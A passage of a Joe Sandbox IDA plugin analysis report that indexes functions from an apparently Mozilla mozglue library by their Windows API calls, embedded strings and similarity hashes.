                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                  • String ID: INF$NAN$inf$nan
                                                                  • API String ID: 1991403756-4166689840
                                                                  • Opcode ID: 698ec120948c11d366ababf9c015c180e0932e164d67185484b42b961551ac3c
                                                                  • Instruction ID: dd3964754dd3dcc148bb5f730ddf7fc3e712800a9b45f28b5a82b257150f5721
                                                                  • Opcode Fuzzy Hash: 698ec120948c11d366ababf9c015c180e0932e164d67185484b42b961551ac3c
                                                                  • Instruction Fuzzy Hash: 42517F7090C7809BD705AF2DC48129EBBF0BF8A319F004A2DE9D5A7A50E771D9858B56
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C5F3492
                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C5F34A9
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C5F34EF
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C5F350E
                                                                  • __Init_thread_footer.LIBCMT ref: 6C5F3522
                                                                  • __aulldiv.LIBCMT ref: 6C5F3552
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C5F357C
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C5F3592
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                  • API String ID: 3634367004-706389432
                                                                  • Opcode ID: 1ab0099d31390b4a6a129f870565ee8d1cb834c985a8abad2ac959bf35eb3361
                                                                  • Instruction ID: 698188b38662887edcabd2c7770091edaab3b5deda3608bac8da3cad4710d6b7
                                                                  • Opcode Fuzzy Hash: 1ab0099d31390b4a6a129f870565ee8d1cb834c985a8abad2ac959bf35eb3361
                                                                  • Instruction Fuzzy Hash: 6531A471B001159BDF09DFB6CC88EAA7775FB86304F100919E511A3750EB74A905CF7A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$moz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3009372454-0
                                                                  • Opcode ID: 954f1c65973f03cf4a2a583f18487acef320d37f8f4f14b659f551f82bf68783
                                                                  • Instruction ID: 864d6404275baeefa0c708da6564f6461580872a9e853372b1f13aff3f714694
                                                                  • Opcode Fuzzy Hash: 954f1c65973f03cf4a2a583f18487acef320d37f8f4f14b659f551f82bf68783
                                                                  • Instruction Fuzzy Hash: 70B1F671A051548FDB1CDE7CCE9076D77B2AF42328F184628E836DBB96E73098428F91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                  • String ID:
                                                                  • API String ID: 1192971331-0
                                                                  • Opcode ID: 0d0f9ef7841c092c2b7e81cd5c653034a68085860c568ca7377e03651dbd5c97
                                                                  • Instruction ID: 20878b8f2753c84148939ee40f1d8988a5a8f68cdd70b868c064c0310c94cd1d
                                                                  • Opcode Fuzzy Hash: 0d0f9ef7841c092c2b7e81cd5c653034a68085860c568ca7377e03651dbd5c97
                                                                  • Instruction Fuzzy Hash: 023171B19043048FDB00BF79C68826EBBF1BF85304F114A2DE98587301EB709459CBA6
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C609675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C609697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6096E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C609707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C60971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C609773
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6097B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C6097D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C6097EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C609824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 409848716-3880535382
                                                                  • Opcode ID: 47af8a3a176814f5686a86a2bcd6014475e7861d31daaeea385ccaf107e05eaf
                                                                  • Instruction ID: b46869e6e347f49d17b25b9dc1a3327c1398f90561c9b3c8c72031ba376144dc
                                                                  • Opcode Fuzzy Hash: 47af8a3a176814f5686a86a2bcd6014475e7861d31daaeea385ccaf107e05eaf
                                                                  • Instruction Fuzzy Hash: 6241CE717002119BDF09CFA6E9D4E9677B5FB8A369F104928ED0597740E734A804CFBA
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C640039
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C640041
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C640075
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C640082
                                                                  • moz_xmalloc.MOZGLUE(00000048), ref: 6C640090
                                                                  • free.MOZGLUE(?), ref: 6C640104
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C64011B
                                                                  Strings
                                                                  • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C64005B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                  • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                  • API String ID: 3012294017-637075127
                                                                  • Opcode ID: 78ce7b5f1b63a45ba2778267193cc2554feaa32bb81294794df27047b988b092
                                                                  • Instruction ID: 5ef7de6a2c4536d97b01b5fbbc502de204563bc6240641be5b4ff40d5ec885ba
                                                                  • Opcode Fuzzy Hash: 78ce7b5f1b63a45ba2778267193cc2554feaa32bb81294794df27047b988b092
                                                                  • Instruction Fuzzy Hash: C941B071500264DFCB25CF65C880A9ABBF0FF4A318F50891DE95A83B41D731A815CFAE
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C607EA7
                                                                  • malloc.MOZGLUE(00000001), ref: 6C607EB3
                                                                    • Part of subcall function 6C60CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C60CB49
                                                                    • Part of subcall function 6C60CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C60CBB6
                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C607EC4
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C607F19
                                                                  • malloc.MOZGLUE(?), ref: 6C607F36
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C607F4D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                  • String ID: d
                                                                  • API String ID: 204725295-2564639436
                                                                  • Opcode ID: 69860499618cceda837815ddb44b06d318db77eb90df3a6705796855d61ffc70
                                                                  • Instruction ID: f8e9716071a38f31089f9c80d608f526405262377c4b6a35fc43b01cf1d42f71
                                                                  • Opcode Fuzzy Hash: 69860499618cceda837815ddb44b06d318db77eb90df3a6705796855d61ffc70
                                                                  • Instruction Fuzzy Hash: BF313D61E043989BDF019F2ACD445FEB778EF96308F045628DD4967612FB30A5C8C399
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E7DC), ref: 6C604C2F
                                                                  • LeaveCriticalSection.KERNEL32(6C67E7DC), ref: 6C604C82
                                                                  • EnterCriticalSection.KERNEL32(6C67E7DC), ref: 6C604C89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Enter$Leave
                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 2801635615-1351931279
                                                                  • Opcode ID: d88ec83cf16c204bdc4f295d4611468304a31f2ec14b0475b9219d1356ef0a00
                                                                  • Instruction ID: 94405f25bf96de9c599e05deeb2bee7a7fb5050e22b000c2f49012cab7130860
                                                                  • Opcode Fuzzy Hash: d88ec83cf16c204bdc4f295d4611468304a31f2ec14b0475b9219d1356ef0a00
                                                                  • Instruction Fuzzy Hash: 47F1FE717056018FD72DCF29C690769B7E1AF92328F28CA5DE4669BAD0CB70D801CB9C
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL ref: 6C603EEE
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C603FDC
                                                                  • RtlAllocateHeap.NTDLL ref: 6C604006
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6040A1
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C603CCC), ref: 6C6040AF
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C603CCC), ref: 6C6040C2
                                                                  • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C604134
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C603CCC), ref: 6C604143
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C603CCC), ref: 6C604157
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Free$Heap$StringUnicode$Allocate
                                                                  • String ID:
                                                                  • API String ID: 3680524765-0
                                                                  • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction ID: ac07c0d931677ad02467f9836fd3ca3fa2348f802d9e8fd4186c98be77089593
                                                                  • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction Fuzzy Hash: 8DA19EB1B00205CFDB54CF69C980A69B7B5FF58308F2541A9D90ABF712D771E886CBA4
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,6C613F47,?,?,?,6C613F47,6C611A70,?), ref: 6C5F207F
                                                                  • memset.VCRUNTIME140(?,000000E5,6C613F47,?,6C613F47,6C611A70,?), ref: 6C5F20DD
                                                                  • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C613F47,6C611A70,?), ref: 6C5F211A
                                                                  • EnterCriticalSection.KERNEL32(6C67E744,?,6C613F47,6C611A70,?), ref: 6C5F2145
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C613F47,6C611A70,?), ref: 6C5F21BA
                                                                  • EnterCriticalSection.KERNEL32(6C67E744,?,6C613F47,6C611A70,?), ref: 6C5F21E0
                                                                  • LeaveCriticalSection.KERNEL32(6C67E744,?,6C613F47,6C611A70,?), ref: 6C5F2232
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                  • API String ID: 889484744-884734703
                                                                  • Opcode ID: f0a116aecfedacb4c657285c1e4cbeed804b77347683838bd1ef4962c6678ad7
                                                                  • Instruction ID: b3007434dd2e166843af3bf93a60c835e83a9771a590560cc85d36ee506c9ddb
                                                                  • Opcode Fuzzy Hash: f0a116aecfedacb4c657285c1e4cbeed804b77347683838bd1ef4962c6678ad7
                                                                  • Instruction Fuzzy Hash: 3161E5B2F002568FDB0CCF69CC89B6E76B5AF85318F184539E534A7A94D7309C01CE99
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C648273), ref: 6C649D65
                                                                  • free.MOZGLUE(6C648273,?), ref: 6C649D7C
                                                                  • free.MOZGLUE(?,?), ref: 6C649D92
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C649E0F
                                                                  • free.MOZGLUE(6C64946B,?,?), ref: 6C649E24
                                                                  • free.MOZGLUE(?,?,?), ref: 6C649E3A
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C649EC8
                                                                  • free.MOZGLUE(6C64946B,?,?,?), ref: 6C649EDF
                                                                  • free.MOZGLUE(?,?,?,?), ref: 6C649EF5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                  • String ID:
                                                                  • API String ID: 956590011-0
                                                                  • Opcode ID: ed3d9aef8342db52bb6e8fcd16a01a5f133d5b94dd386bbfa3ba520d89ada80e
                                                                  • Instruction ID: 92c91ff30e13bbb1ca05695132c5ff8fd6284da61f11b42b6b5acac998a99c9d
                                                                  • Opcode Fuzzy Hash: ed3d9aef8342db52bb6e8fcd16a01a5f133d5b94dd386bbfa3ba520d89ada80e
                                                                  • Instruction Fuzzy Hash: 93719F70909B418BC712CF18C58095BF7F9FF99319B44D61DE85A5BB12EB30E886CB89
                                                                  APIs
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DDCF
                                                                    • Part of subcall function 6C62FA00: ReleaseSRWLockExclusive.KERNEL32(?,?,6C605407), ref: 6C62FA4B
                                                                    • Part of subcall function 6C6490E0: free.MOZGLUE(00000000,00000000,00000000,?,6C64B6F6,?,?,?,?,?,6C64B127), ref: 6C6490FF
                                                                    • Part of subcall function 6C6490E0: free.MOZGLUE(?,00000000,00000000,?,6C64B6F6,?,?,?,?,?,6C64B127), ref: 6C649108
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DE0D
                                                                  • free.MOZGLUE(00000000,?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DE41
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DE5F
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DEA3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DEE9
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C63DEFD), ref: 6C64DF32
                                                                    • Part of subcall function 6C64DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,00000000,?,?,?,6C64DF7F,?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DB86
                                                                    • Part of subcall function 6C64DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?,?,?,?,00000000,?,?,?,6C64DF7F,?,?,00000000,00000000), ref: 6C64DC0E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C63DEFD), ref: 6C64DF65
                                                                  • free.MOZGLUE(?,?,?,00000000,00000000,?,6C63DEFD), ref: 6C64DF80
                                                                    • Part of subcall function 6C615E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C615EDB
                                                                    • Part of subcall function 6C615E90: memset.VCRUNTIME140(ewel,000000E5,?), ref: 6C615F27
                                                                    • Part of subcall function 6C615E90: LeaveCriticalSection.KERNEL32(?), ref: 6C615FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                  • String ID:
                                                                  • API String ID: 112305417-0
                                                                  • Opcode ID: 37233fd523766500307ecf64931df570152b572709844ccb32b60bfddc35ef95
                                                                  • Instruction ID: 3070d898546eda05239daaec30fccf1a5fc4dce1859361e55083353b0e07c97b
                                                                  • Opcode Fuzzy Hash: 37233fd523766500307ecf64931df570152b572709844ccb32b60bfddc35ef95
                                                                  • Instruction Fuzzy Hash: 1D51C672E016119BD7219B29C880AEEB372AF92308F95C51CD51A53F00D731F81ACB9E
                                                                  APIs
                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655D32
                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655D62
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655D6D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655D84
                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655DA4
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655DC9
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C655DDB
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655E00
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C655C8C,?,6C62E829), ref: 6C655E45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 2325513730-0
